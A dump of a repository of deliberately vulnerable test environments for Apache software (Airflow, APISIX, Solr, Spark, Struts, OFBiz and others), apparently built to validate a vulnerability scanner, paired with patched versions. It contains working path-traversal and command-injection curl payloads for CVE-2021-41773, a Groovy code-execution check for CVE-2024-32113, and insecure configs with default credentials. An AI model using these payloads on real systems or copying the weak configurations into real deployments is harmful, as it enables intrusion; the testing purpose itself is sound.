82 | 83 | flower: 84 | <<: *airflow-common 85 | command: flower 86 | ports: 87 | - 5555:5555 88 | healthcheck: 89 | test: ["CMD", "curl", "--fail", "http://localhost:5555/"] 90 | interval: 10s 91 | timeout: 10s 92 | retries: 5 93 | -------------------------------------------------------------------------------- /apache/airflow/CVE-2020-17526/init-user.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import os 3 | from airflow import models, settings 4 | from airflow.contrib.auth.backends.password_auth import PasswordUser 5 | 6 | os.system('/entrypoint initdb') 7 | 8 | user = PasswordUser(models.User()) 9 | user.username = 'vulhub' 10 | user.email = 'vulhub@example.com' 11 | user.password = 'vulhub' 12 | user.superuser = True 13 | session = settings.Session() 14 | session.add(user) 15 | session.commit() 16 | session.close() 17 | print('initial user finished') 18 | -------------------------------------------------------------------------------- /apache/airflow/ExposedUI/DockerfileSafe: -------------------------------------------------------------------------------- 1 | FROM ubuntu:22.04 2 | LABEL authors="am0o0" 3 | RUN apt update \ 4 | && apt install python3 python3-venv python3-pip -y 5 | RUN mkdir airflowWorkSpace 6 | WORKDIR airflowWorkSpace 7 | RUN mkdir config 8 | COPY webserver_config_safe.py config/webserver_config.py 9 | 10 | RUN python3 -m venv .venv 11 | RUN bash -c "source .venv/bin/activate && pip install apache-airflow" 12 | 13 | ENTRYPOINT ["bash","-c","export AIRFLOW_HOME='/airflowWorkSpace/config'; \ 14 | source .venv/bin/activate && airflow standalone"] 15 | -------------------------------------------------------------------------------- /apache/airflow/ExposedUI/DockerfileUnSafe: -------------------------------------------------------------------------------- 1 | FROM ubuntu:22.04 2 | LABEL authors="am0o0" 3 | RUN apt update \ 4 | && apt install python3 python3-venv python3-pip -y 5 
| RUN mkdir airflowWorkSpace 6 | WORKDIR airflowWorkSpace 7 | RUN mkdir config 8 | COPY webserver_config_unsafe.py config/webserver_config.py 9 | 10 | RUN python3 -m venv .venv 11 | RUN bash -c "source .venv/bin/activate && pip install apache-airflow" 12 | 13 | ENTRYPOINT ["bash","-c","export AIRFLOW__CORE__TEST_CONNECTION=Enabled AIRFLOW_HOME='/airflowWorkSpace/config'; \ 14 | source .venv/bin/activate && airflow standalone "] 15 | -------------------------------------------------------------------------------- /apache/airflow/ExposedUI/README.md: -------------------------------------------------------------------------------- 1 | # Initialize 2 | run `docker compose up` to start both vulnerable and safe airflow instances. 3 | 4 | # vulnerble airflow instance 5 | 1. You can now navigate to `http://172.20.0.2:8080/home`. Notice that no authorization is needed to access the panel. 6 | 2. Navigate to `http://localhost:8080/connection/add`. From there, you can select the HTTP connection type. 7 | 3. Notice that the Test button is enabled. With it, you can test the out-of-band interaction. 8 | 9 | You can find the reference here: [https://airflow.apache.org/docs/apache-airflow-providers-fab/stable/auth-manager/webserver-authentication.html#webserver-authentication](https://airflow.apache.org/docs/apache-airflow-providers-fab/stable/auth-manager/webserver-authentication.html#webserver-authentication) 10 | 11 | # safe airflow instance 12 | Unlike the unsafe setup, here the `AUTH_ROLE_PUBLIC = 'Admin'` is removed from the `config/webserver_config.py` file. Moreover, we don't export the `AIRFLOW__CORE__TEST_CONNECTION=Enabled` environment variable. 13 | 1. You can now navigate to [http://172.20.0.3:8080/home](http://localhost:8080/home). 14 | 2. Notice that, this time, you need to be authenticated to hit the endpoint. As a result of this, you will be redirect to the `/login` page. 
15 | -------------------------------------------------------------------------------- /apache/airflow/ExposedUI/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '2' 2 | 3 | networks: 4 | airflow: 5 | ipam: 6 | config: 7 | - subnet: 172.20.0.0/24 8 | 9 | services: 10 | airflow_unsafe: 11 | container_name: airflow_unsafe 12 | build: 13 | dockerfile: DockerfileUnSafe 14 | image: airflow_unsafe:v1 15 | networks: 16 | airflow: 17 | ipv4_address: 172.20.0.2 18 | ports: 19 | - "8080" 20 | airflow_safe: 21 | container_name: airflow_safe 22 | build: 23 | dockerfile: DockerfileSafe 24 | image: airflow_safe:v1 25 | networks: 26 | airflow: 27 | ipv4_address: 172.20.0.3 28 | ports: 29 | - "8080" -------------------------------------------------------------------------------- /apache/airflow/ExposedUI/webserver_config_safe.py: -------------------------------------------------------------------------------- 1 | from __future__ import annotations 2 | import os 3 | from flask_appbuilder.const import AUTH_DB 4 | basedir = os.path.abspath(os.path.dirname(__file__)) 5 | WTF_CSRF_ENABLED = True 6 | WTF_CSRF_TIME_LIMIT = None 7 | AUTH_TYPE = AUTH_DB -------------------------------------------------------------------------------- /apache/airflow/ExposedUI/webserver_config_unsafe.py: -------------------------------------------------------------------------------- 1 | from __future__ import annotations 2 | import os 3 | from flask_appbuilder.const import AUTH_DB 4 | basedir = os.path.abspath(os.path.dirname(__file__)) 5 | WTF_CSRF_ENABLED = True 6 | WTF_CSRF_TIME_LIMIT = None 7 | AUTH_TYPE = AUTH_DB 8 | AUTH_ROLE_PUBLIC = 'Admin' -------------------------------------------------------------------------------- /apache/apisix/Default_api_token/README.md: -------------------------------------------------------------------------------- 1 | # Apache APISIX Default API Token 2 | 3 | 4 | This directory contains the deployment 
configs for an Apache APISIX installation 5 | Apache APISIX has a built-in default API KEY. If the user does not proactively modify it (which few will), Lua scripts 6 | can be executed directly through the API interface, which can lead to RCE vulnerabilities. 7 | 8 | You can start the vulnerable service by running the command `docker compose up -d`. The deployed container has name `apache-apisix-defaul-api-token` and listens on port `9080`. 9 | 10 | The container that is not affected by the vulnerability is `apache-apisix-defaul-api-token-safe`, you can start it with `docker compose -f docker-compose-non-vulnerable.yml up -d`, and the service listens on port `9081`. 11 | -------------------------------------------------------------------------------- /apache/apisix/Default_api_token/config_api_key_change.yml: -------------------------------------------------------------------------------- 1 | apisix: 2 | node_listen: 9080 3 | enable_ipv6: false 4 | allow_admin: 5 | - 0.0.0.0/0 6 | enable_control: true 7 | admin_key: 8 | - name: "admin" 9 | key: "5b356d34fe8c4983ba07f6b7e9fbfb57" 10 | role: "admin" 11 | control: 12 | ip: "0.0.0.0" 13 | port: 9092 14 | etcd: 15 | host: 16 | - "http://etcd:2379" 17 | prefix: "/apisix" 18 | timeout: 30 19 | -------------------------------------------------------------------------------- /apache/apisix/Default_api_token/config_default.yml: -------------------------------------------------------------------------------- 1 | apisix: 2 | node_listen: 9080 3 | enable_ipv6: false 4 | allow_admin: 5 | - 0.0.0.0/0 6 | enable_control: true 7 | control: 8 | ip: "0.0.0.0" 9 | port: 9092 10 | etcd: 11 | host: 12 | - "http://etcd:2379" 13 | prefix: "/apisix" 14 | timeout: 30 15 | -------------------------------------------------------------------------------- /apache/apisix/Default_api_token/docker-compose-non-vulnerable.yml: -------------------------------------------------------------------------------- 1 | services: 2 | 
apache-apisix-defaul-api-token-safe: 3 | image: apache/apisix:2.11.0-alpine 4 | restart: unless-stopped 5 | ports: 6 | - "9081:9080" 7 | volumes: 8 | - ./config_api_key_change.yml:/usr/local/apisix/conf/config.yaml:ro 9 | depends_on: 10 | - etcd 11 | etcd: 12 | image: bitnami/etcd:3.4.15 13 | environment: 14 | ETCD_ENABLE_V2: "true" 15 | ALLOW_NONE_AUTHENTICATION: "yes" 16 | ETCD_ADVERTISE_CLIENT_URLS: "http://0.0.0.0:2379" 17 | ETCD_LISTEN_CLIENT_URLS: "http://0.0.0.0:2379" 18 | -------------------------------------------------------------------------------- /apache/apisix/Default_api_token/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | apache-apisix-defaul-api-token: 3 | image: apache/apisix:2.11.0-alpine 4 | restart: unless-stopped 5 | ports: 6 | - "9080:9080" 7 | volumes: 8 | - ./config_default.yml:/usr/local/apisix/conf/config.yaml:ro 9 | depends_on: 10 | - etcd 11 | etcd: 12 | image: bitnami/etcd:3.4.15 13 | environment: 14 | ETCD_ENABLE_V2: "true" 15 | ALLOW_NONE_AUTHENTICATION: "yes" 16 | ETCD_ADVERTISE_CLIENT_URLS: "http://0.0.0.0:2379" 17 | ETCD_LISTEN_CLIENT_URLS: "http://0.0.0.0:2379" 18 | -------------------------------------------------------------------------------- /apache/flink/CVE-2020-17519/README.md: -------------------------------------------------------------------------------- 1 | 2 | # Apache Flink 3 | 4 | This directory contains the deployment configs for an Apache Flink installation 5 | that's vulnerable to CVE-2020-17519 (Directory Traversal via JobManager service) 6 | and unauthenticated user access. 7 | 8 | Please use flink version 1.11.1-scala_2.11-java11 for vulnerability related to 9 | CVE-2020-17519. 10 | 11 | The deployed service has name `apache-flink` and listens on port 12 | `8080`. 
13 | -------------------------------------------------------------------------------- /apache/flink/apache-flink.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing the vulnerable Apache Flink service. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: apache-flink 6 | labels: 7 | app: apache-flink 8 | version: ${flink_version} 9 | spec: 10 | ports: 11 | - protocol: TCP 12 | port: 8080 13 | name: http 14 | targetPort: 8081 15 | selector: 16 | app: apache-flink 17 | version: ${flink_version} 18 | tier: frontend 19 | type: LoadBalancer 20 | --- 21 | # The vulnerable Apache Flink service. 22 | apiVersion: apps/v1 23 | kind: Deployment 24 | metadata: 25 | name: apache-flink 26 | labels: 27 | app: apache-flink 28 | version: ${flink_version} 29 | spec: 30 | selector: 31 | matchLabels: 32 | app: apache-flink 33 | version: ${flink_version} 34 | tier: frontend 35 | strategy: 36 | type: Recreate 37 | template: 38 | metadata: 39 | labels: 40 | app: apache-flink 41 | version: ${flink_version} 42 | tier: frontend 43 | spec: 44 | containers: 45 | - name: apache-flink 46 | image: flink:${flink_version} 47 | ports: 48 | - containerPort: 8081 49 | args: [ "jobmanager" ] 50 | env: 51 | - name: FLINK_PROPERTIES 52 | value: "jobmanager.rpc.address: jobmanager" 53 | -------------------------------------------------------------------------------- /apache/hive/weak_credentials/base.ldif: -------------------------------------------------------------------------------- 1 | dn: ou=test,dc=example,dc=com 2 | objectClass: organizationalUnit 3 | ou: test 4 | 5 | dn: uid=test,ou=test,dc=example,dc=com 6 | objectClass: inetOrgPerson 7 | uid: test 8 | sn: test 9 | givenName: test 10 | cn: test 11 | displayName: test 12 | userPassword: test -------------------------------------------------------------------------------- /apache/hive/weak_credentials/docker-compose.yml: 
-------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | ldap: 5 | image: osixia/openldap:1.5.0 6 | container_name: my-openldap-container 7 | environment: 8 | LDAP_ORGANISATION: "Example Inc." 9 | LDAP_DOMAIN: "example.com" 10 | LDAP_ADMIN_PASSWORD: "adminpassword" 11 | ports: 12 | - "389:389" 13 | volumes: 14 | - ldap_data:/var/lib/ldap 15 | - ldap_config:/etc/ldap/slapd.d 16 | 17 | phpldapadmin: 18 | image: osixia/phpldapadmin:latest 19 | container_name: my-phpldapadmin-container 20 | environment: 21 | PHPLDAPADMIN_LDAP_HOSTS: "ldap" 22 | ports: 23 | - "6443:443" 24 | depends_on: 25 | - ldap 26 | 27 | volumes: 28 | ldap_data: 29 | ldap_config: 30 | -------------------------------------------------------------------------------- /apache/hive/weak_credentials/hive-site.xml: -------------------------------------------------------------------------------- 1 | 2 | 18 | 19 | 20 | hive.server2.enable.doAs 21 | false 22 | 23 | 24 | hive.tez.exec.inplace.progress 25 | false 26 | 27 | 28 | hive.exec.scratchdir 29 | /opt/hive/scratch_dir 30 | 31 | 32 | hive.user.install.directory 33 | /opt/hive/install_dir 34 | 35 | 36 | tez.runtime.optimize.local.fetch 37 | true 38 | 39 | 40 | hive.exec.submit.local.task.via.child 41 | false 42 | 43 | 44 | mapreduce.framework.name 45 | local 46 | 47 | 48 | tez.local.mode 49 | true 50 | 51 | 52 | hive.execution.engine 53 | tez 54 | 55 | 56 | metastore.warehouse.dir 57 | /opt/hive/data/warehouse 58 | 59 | 60 | metastore.metastore.event.db.notification.api.auth 61 | false 62 | 63 | 64 | 65 | hive.security.authorization.manager 66 | org.apache.hadoop.hive.ql.security.authorization.plugin.sqlstd.SQLStdHiveAuthorizerFactory 67 | 68 | 69 | 70 | hive.security.authorization.enabled 71 | true 72 | 73 | 74 | 75 | hive.users.in.admin.role 76 | hive 77 | 78 | 79 | 80 | hive.server2.authentication 81 | LDAP 82 | 83 | 84 | hive.server2.authentication.ldap.url 85 | ldap://192.168.64.1:389 86 | 
87 | 88 | hive.server2.authentication.ldap.baseDN 89 | dc=example,dc=com 90 | 91 | 92 | hive.server2.authentication.ldap.userDNPattern 93 | uid=%s,ou=test,dc=example,dc=com 94 | 95 | 96 | -------------------------------------------------------------------------------- /apache/http/CVE-2021-41773/README.md: -------------------------------------------------------------------------------- 1 | # Apache HTTP Server CVE-2021-41773 2 | 3 | Use existing docker images & instructions from https://github.com/BlueTeamSteve/CVE-2021-41773. 4 | 5 | ## Path Traversal & File Read (with mod_cgi disabled) 6 | 7 | ```sh 8 | docker pull blueteamsteve/cve-2021-41773:no-cgid 9 | docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid 10 | 11 | curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd 12 | ``` 13 | 14 | ## RCE (with mod_cgi enabled) 15 | 16 | ```sh 17 | docker pull blueteamsteve/cve-2021-41773:with-cgid 18 | docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid 19 | 20 | curl 'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id' 21 | ``` 22 | -------------------------------------------------------------------------------- /apache/mod_proxy/CVE-2021-40438/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM httpd:2.4.48 2 | COPY ./config/httpd.conf /usr/local/apache2/conf/httpd.conf 3 | -------------------------------------------------------------------------------- /apache/mod_proxy/CVE-2021-40438/README.md: -------------------------------------------------------------------------------- 1 | # Apache mod_proxy CVE-2021-40438 2 | 3 | This directory contains the deployment configs for an Apache mod_proxy 4 | installation that's vulnerable to CVE-2021-40438, a SSRF. 5 | 6 | The deployed service has name `apache_mod_proxy_cve_2021_40438` and listens on 7 | port `8080`. 
8 | 9 | 10 | -------------------------------------------------------------------------------- /apache/mod_proxy/CVE-2021-40438/apache-mod-proxy-cve-2021-40438.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing an Apache httpd instance with SSRF exploitable mod_proxy. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: apache-mod-proxy-cve-2021-40438 6 | labels: 7 | app: apache-mod-proxy-cve-2021-40438 8 | spec: 9 | ports: 10 | - port: 80 11 | name: http 12 | targetPort: 80 13 | selector: 14 | app: apache-mod-proxy-cve-2021-40438 15 | type: LoadBalancer 16 | --- 17 | apiVersion: apps/v1 18 | kind: Deployment 19 | metadata: 20 | name: apache-mod-proxy-cve-2021-40438 21 | labels: 22 | app: apache-mod-proxy-cve-2021-40438 23 | spec: 24 | selector: 25 | matchLabels: 26 | app: apache-mod-proxy-cve-2021-40438 27 | tier: frontend 28 | strategy: 29 | type: Recreate 30 | template: 31 | metadata: 32 | labels: 33 | app: apache-mod-proxy-cve-2021-40438 34 | tier: frontend 35 | spec: 36 | containers: 37 | - name: apache-mod-proxy-cve-2021-40438 38 | image: ${mod_proxy_img} 39 | ports: 40 | - containerPort: 80 41 | -------------------------------------------------------------------------------- /apache/nifi_api/exposed_ui/README.md: -------------------------------------------------------------------------------- 1 | # Vulnerable Apache NiFi API with Exposed UI 2 | 3 | This directory contains the deployment configs for a vulnerable Apache NiFi API 4 | version (1.12.0). 5 | 6 | The deployed service has name `apache-nifi-api` and listens on port `8080`. 7 | -------------------------------------------------------------------------------- /apache/nifi_api/exposed_ui/apache_nifi_api.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing the unprotected Apache NiFI API service. 
2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: apache-nifi-api 6 | labels: 7 | app: apache-nifi-api 8 | spec: 9 | ports: 10 | - protocol: TCP 11 | name: http 12 | port: 80 13 | targetPort: 8080 14 | selector: 15 | app: apache-nifi-api 16 | type: LoadBalancer 17 | --- 18 | # The vulnerable Apache NiFI API service with exposed UI. 19 | apiVersion: apps/v1 20 | kind: Deployment 21 | metadata: 22 | name: apache-nifi-api 23 | labels: 24 | app: apache-nifi-api 25 | spec: 26 | selector: 27 | matchLabels: 28 | app: apache-nifi-api 29 | tier: frontend 30 | strategy: 31 | type: Recreate 32 | template: 33 | metadata: 34 | labels: 35 | app: apache-nifi-api 36 | tier: frontend 37 | spec: 38 | containers: 39 | - name: apache-nifi-api 40 | image: apache/nifi:1.12.0 41 | ports: 42 | - containerPort: 8080 43 | command: ["../scripts/start.sh"] 44 | -------------------------------------------------------------------------------- /apache/ofbiz/cve-2024-32113/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2024-32113 2 | 3 | ## Vulnerable Release 4 | 5 | To create a vulnerable release, run `make_vulnerable.sh`. This will create a 6 | directory `vulnerable-ofbiz` containing ofbiz-framework release 18.12.12 and a 7 | docker image `ofbiz-docker-vulnerable` and start running the docker image on 8 | port 8443. 9 | 10 | ## Patched Release 11 | 12 | To create a patched release, run `make_patched.sh`. This will create a directory 13 | `patched-ofbiz` containing ofbiz-framework release 18.12.13 and a docker image 14 | `ofbiz-docker-patched` and start running the docker image on port 8443. 15 | 16 | ## Testing CVE-2024-32113 17 | 18 | With a vulnerable release running on port 8443 of your local machine, run 19 | `check_vulnerability.py` and it should display: 20 | 21 | ``` 22 | OFBIZ Instance at https://localhost:8443. is vulnerable to CVE-2024-32113. 
23 | ``` 24 | 25 | With a patched release running on port 8443 of your local machine, run 26 | `check_vulnerability.py` and it should display: 27 | 28 | ``` 29 | Vulnerability not detected in https://localhost:8443. 30 | ``` 31 | -------------------------------------------------------------------------------- /apache/ofbiz/cve-2024-32113/check_vulnerability.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | """Checks if an OFBIZ instance at localhost:8443 is vulnerable to CVE-2024-32113.""" 3 | 4 | import re 5 | import requests 6 | import urllib3 7 | 8 | TARGET = 'https://localhost:8443' 9 | 10 | 11 | def TestIsVulnerable(target): 12 | """Tests if an OFBIZ instance at the given target is vulnerable to CVE-2024-32113. 13 | 14 | Args: 15 | target: The target URL of the OFBIZ instance. 16 | """ 17 | url = f'{target}/webtools/control/forgotPassword/foo/../ProgramExport' 18 | headers = {'Content-Type': 'application/x-www-form-urlencoded'} 19 | data = {'groovyProgram': "throw new Exception('id'.execute().text);"} 20 | 21 | response = requests.post(url, headers=headers, data=data, verify=False) 22 | match = re.search( 23 | r'java\.lang\.Exception:(\s*uid=.* gid=.* groups=.*)', response.text 24 | ) 25 | 26 | if match: 27 | print(f'OFBIZ Instance at {target} is vulnerable to CVE-2024-32113.') 28 | else: 29 | print(f'Vulnerability not detected in {target}.') 30 | 31 | 32 | def main(): 33 | urllib3.disable_warnings() 34 | TestIsVulnerable(TARGET) 35 | 36 | 37 | if __name__ == '__main__': 38 | main() 39 | -------------------------------------------------------------------------------- /apache/ofbiz/cve-2024-32113/make_patched.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | set -e 3 | 4 | echo "Cloning ofbiz-framework" 5 | git clone https://github.com/apache/ofbiz-framework.git patched-ofbiz 6 | 7 | echo "Checking out a patched release" 8 | cd patched-ofbiz 
9 | git checkout release18.12.13 10 | 11 | echo "Building a docker image from the patched release" 12 | # Tag the patched build with its own name so it matches the README and does
# not overwrite the `ofbiz-docker-vuln` image built by make_vulnerable.sh.
sudo docker build --tag ofbiz-docker-patched . 13 | 14 | echo "Running the docker image" 15 | sudo docker run -it --name ofbiz-docker-patched -p 8443:8443 ofbiz-docker-patched 16 | -------------------------------------------------------------------------------- /apache/ofbiz/cve-2024-32113/make_vulnerable.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | set -e 3 | 4 | echo "Cloning ofbiz-framework" 5 | git clone https://github.com/apache/ofbiz-framework.git vulnerable-ofbiz 6 | 7 | echo "Checking out a vulnerable release" 8 | cd vulnerable-ofbiz 9 | git checkout release18.12.12 10 | 11 | echo "Building a docker image from the vulnerable release" 12 | sudo docker build --tag ofbiz-docker-vuln . 13 | 14 | echo "Running the docker image" 15 | sudo docker run -it --name ofbiz-docker-vulnerable -p 8443:8443 ofbiz-docker-vuln 16 | -------------------------------------------------------------------------------- /apache/solr/CVE-2019-12409/README.md: -------------------------------------------------------------------------------- 1 | # Apache Solr CVE-2019-12409 2 | 3 | This directory contains the deployment configs for an Apache Solr installation 4 | that's vulnerable to CVE-2019-12409 (RCE via unprotected JMX service). 5 | 6 | The deployed service has name `apache-solr-cve-2019-12409` and listens on port 7 | `18983`. 8 | -------------------------------------------------------------------------------- /apache/solr/CVE-2019-12409/apache-solr-cve-2019-12409.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing the unprotected Apache Solr service. 
2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: apache-solr-cve-2019-12409 6 | labels: 7 | app: apache-solr-cve-2019-12409 8 | spec: 9 | ports: 10 | - protocol: TCP 11 | port: 18983 12 | targetPort: 18983 13 | selector: 14 | app: apache-solr-cve-2019-12409 15 | type: LoadBalancer 16 | # We use a static IP here because we need to explicitly specify the 17 | # -Djava.rmi.server.hostname option during solr startup. 18 | # This IP is reserved as a static IP in the tsunami-testbed GCP project. 19 | loadBalancerIP: 35.197.41.133 20 | --- 21 | # The vulnerable Apache Solr service. 22 | apiVersion: apps/v1 23 | kind: Deployment 24 | metadata: 25 | name: apache-solr-cve-2019-12409 26 | labels: 27 | app: apache-solr-cve-2019-12409 28 | spec: 29 | selector: 30 | matchLabels: 31 | app: apache-solr-cve-2019-12409 32 | tier: frontend 33 | strategy: 34 | type: Recreate 35 | template: 36 | metadata: 37 | labels: 38 | app: apache-solr-cve-2019-12409 39 | tier: frontend 40 | spec: 41 | containers: 42 | - name: apache-solr-cve-2019-12409 43 | image: solr:8.2.0 44 | ports: 45 | - containerPort: 18983 46 | env: 47 | - name: SOLR_OPTS 48 | value: "-Djava.rmi.server.hostname=35.197.41.133" 49 | -------------------------------------------------------------------------------- /apache/solr/CVE-2019-17558/README.md: -------------------------------------------------------------------------------- 1 | # Apache Solr CVE-2019-17558 2 | 3 | This directory contains the deployment configs for an Apache Solr installation 4 | that's vulnerable to CVE-2019-17558 (RCE via velocity template). 5 | 6 | The deployed service has name `apache-solr-cve-2019-17558` and listens on port 7 | `8983`. 
8 | -------------------------------------------------------------------------------- /apache/solr/CVE-2019-17558/apache-solr-cve-2019-17558.yaml: -------------------------------------------------------------------------------- 1 | # The k8s service exposing the Solr app version 8.2.0 vulnerable to CVE 2019-17558. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: apache-solr-cve-2019-17558 6 | labels: 7 | app: apache-solr-cve-2019-17558 8 | spec: 9 | ports: 10 | - port: 8983 11 | selector: 12 | app: apache-solr-cve-2019-17558 13 | tier: frontend 14 | type: LoadBalancer 15 | --- 16 | # Solr app version 8.2.0. 17 | apiVersion: apps/v1 18 | kind: Deployment 19 | metadata: 20 | name: apache-solr-cve-2019-17558 21 | labels: 22 | app: apache-solr-cve-2019-17558 23 | spec: 24 | selector: 25 | matchLabels: 26 | app: apache-solr-cve-2019-17558 27 | tier: frontend 28 | strategy: 29 | type: Recreate 30 | template: 31 | metadata: 32 | labels: 33 | app: apache-solr-cve-2019-17558 34 | tier: frontend 35 | spec: 36 | containers: 37 | - image: solr:8.2.0-slim 38 | name: apache-solr-cve-2019-17558 39 | command: ["solr-demo"] 40 | ports: 41 | - containerPort: 8983 42 | livenessProbe: 43 | httpGet: 44 | path: /solr/ 45 | port: 8983 46 | -------------------------------------------------------------------------------- /apache/spark/CVE-2022-33891/README.md: -------------------------------------------------------------------------------- 1 | Apache Spark CVE-2022-33891 2 | 3 | This directory contains the deployment config for Apache Spark. Versions earlier than 3.2.2 or 3.3.0 are affected by this vulnerability. 4 | 5 | The deployed service listens on port `8080`. 
6 | 7 | ## Vulnerable version 8 | docker-compose -f vuln-docker-compose.yml up -d 9 | 10 | ## Fixed version 11 | docker-compose -f fixed-docker-compose.yml up -d 12 | -------------------------------------------------------------------------------- /apache/spark/CVE-2022-33891/fixed-docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '2' 2 | 3 | services: 4 | spark: 5 | image: docker.io/bitnami/spark:3.2.4 6 | environment: 7 | - SPARK_MODE=master 8 | - SPARK_RPC_AUTHENTICATION_ENABLED=no 9 | - SPARK_RPC_ENCRYPTION_ENABLED=no 10 | - SPARK_LOCAL_STORAGE_ENCRYPTION_ENABLED=no 11 | - SPARK_SSL_ENABLED=no 12 | ports: 13 | - '8080:8080' 14 | -------------------------------------------------------------------------------- /apache/spark/CVE-2022-33891/vuln-docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '2' 2 | 3 | services: 4 | spark: 5 | image: docker.io/bitnami/spark:3.1.1 6 | entrypoint: ["/bin/bash", "-c", "echo \"spark.acls.enable true\" >> /opt/bitnami/spark/conf/spark-defaults.conf && /opt/bitnami/scripts/spark/entrypoint.sh && /opt/bitnami/scripts/spark/run.sh"] 7 | environment: 8 | - SPARK_MODE=master 9 | - SPARK_RPC_AUTHENTICATION_ENABLED=no 10 | - SPARK_RPC_ENCRYPTION_ENABLED=no 11 | - SPARK_LOCAL_STORAGE_ENCRYPTION_ENABLED=no 12 | - SPARK_SSL_ENABLED=no 13 | ports: 14 | - '8080:8080' 15 | -------------------------------------------------------------------------------- /apache/spark/exposed_api/README.md: -------------------------------------------------------------------------------- 1 | # Apache Spark Exposed API 2 | 3 | This directory contains a docker-compose file which sets up an Apache Spark environment which exposes the Spark API to an unauthenticated attacker. 
4 | 5 | In the worst case such an exposed endpoint allows an unauthenticated attacker to dynamically load an attacker-controlled JAR and execute arbitrary code. 6 | 7 | ## Environment 8 | 9 | The deployed environment contains a Spark `master` node which exposes its API endpoint on the default port `6066`. 10 | 11 | The environment also contains a worker node which processes the attacker-submitted task. 12 | 13 | The environment can be started with `docker compose up -d` 14 | -------------------------------------------------------------------------------- /apache/spark/exposed_api/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '2' 2 | 3 | services: 4 | master: 5 | image: docker.io/bitnami/spark:3.4.2 6 | entrypoint: ["/bin/bash", "-c", "echo \"spark.master.rest.enabled true\" >> /opt/bitnami/spark/conf/spark-defaults.conf && /opt/bitnami/scripts/spark/entrypoint.sh /opt/bitnami/scripts/spark/run.sh"] 7 | environment: 8 | - SPARK_MODE=master 9 | ports: 10 | - '6066:6066' 11 | slave: 12 | entrypoint: ["/bin/bash", "-c", "/opt/bitnami/scripts/spark/entrypoint.sh /opt/bitnami/scripts/spark/run.sh"] 13 | image: docker.io/bitnami/spark:3.4.2 14 | depends_on: 15 | - master 16 | healthcheck: 17 | # Our master takes a few seconds to be able to accept workers. 18 | # The start-worker.sh script exits with "0", even if it didn't connect successfully. However, it exits with 1 if the worker is already registered. 19 | # The following command switches the exit codes around. As soon as a worker is already registered, the health check is successful. 
20 | test: bash -c 'if /opt/bitnami/spark/sbin/start-worker.sh spark://master:7077; then exit 1; else exit 0;fi' 21 | interval: 3s 22 | retries: 5 23 | start_period: 5s 24 | timeout: 5s 25 | -------------------------------------------------------------------------------- /apache/spark/exposed_ui/README.md: -------------------------------------------------------------------------------- 1 | # Apache Spark Exposed Web UI 2 | 3 | This directory contains a docker-compose file which sets up an Apache Spark environment which exposes its web UI to an unauthenticated attacker. 4 | 5 | In the worst case such an exposed endpoint allows an unauthenticated attacker to retrieve data about tasks run by the server. 6 | 7 | ## Environment 8 | 9 | The deployed environment contains a Spark `master` node which exposes its web UI on the default port `8080`. 10 | 11 | The environment can be started with `docker compose up -d` 12 | -------------------------------------------------------------------------------- /apache/spark/exposed_ui/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '2' 2 | 3 | services: 4 | master: 5 | image: docker.io/bitnami/spark:3.4.2 6 | entrypoint: ["/bin/bash", "-c", "/opt/bitnami/scripts/spark/entrypoint.sh /opt/bitnami/scripts/spark/run.sh"] 7 | environment: 8 | - SPARK_MODE=master 9 | ports: 10 | - '8080:8080' 11 | -------------------------------------------------------------------------------- /apache/structs/CVE-2017-5638/README.md: -------------------------------------------------------------------------------- 1 | # Apache Struts CVE-2017-5638 2 | 3 | This directory contains the deployment configs for an Apache Struts installation 4 | that's vulnerable to CVE-2017-5638 (RCE via command injection in the content 5 | type header). 6 | 7 | The deployed service has name `apache-struts2-cve-2017-5638` and listens on port 8 | `80`. 
9 | -------------------------------------------------------------------------------- /apache/structs/CVE-2017-5638/apache-struts-cve-2017-5638.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing the vulnerable Apache Struts app. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: apache-struts2-cve-2017-5638 6 | labels: 7 | app: apache-struts2-cve-2017-5638 8 | spec: 9 | ports: 10 | - port: 80 11 | name: http 12 | targetPort: 8080 13 | selector: 14 | app: apache-struts2-cve-2017-5638 15 | type: LoadBalancer 16 | --- 17 | # The vulnerable Apache Struts app. 18 | apiVersion: apps/v1 19 | kind: Deployment 20 | metadata: 21 | name: apache-struts2-cve-2017-5638 22 | labels: 23 | app: apache-struts2-cve-2017-5638 24 | spec: 25 | selector: 26 | matchLabels: 27 | app: apache-struts2-cve-2017-5638 28 | tier: frontend 29 | strategy: 30 | type: Recreate 31 | template: 32 | metadata: 33 | labels: 34 | app: apache-struts2-cve-2017-5638 35 | tier: frontend 36 | spec: 37 | containers: 38 | - name: apache-struts2-cve-2017-5638 39 | image: piesecurity/apache-struts2-cve-2017-5638 40 | ports: 41 | - containerPort: 8080 42 | -------------------------------------------------------------------------------- /apache/structs/CVE-2017-9805/README.md: -------------------------------------------------------------------------------- 1 | # Apache Struts CVE-2017-9805 2 | 3 | This directory contains the 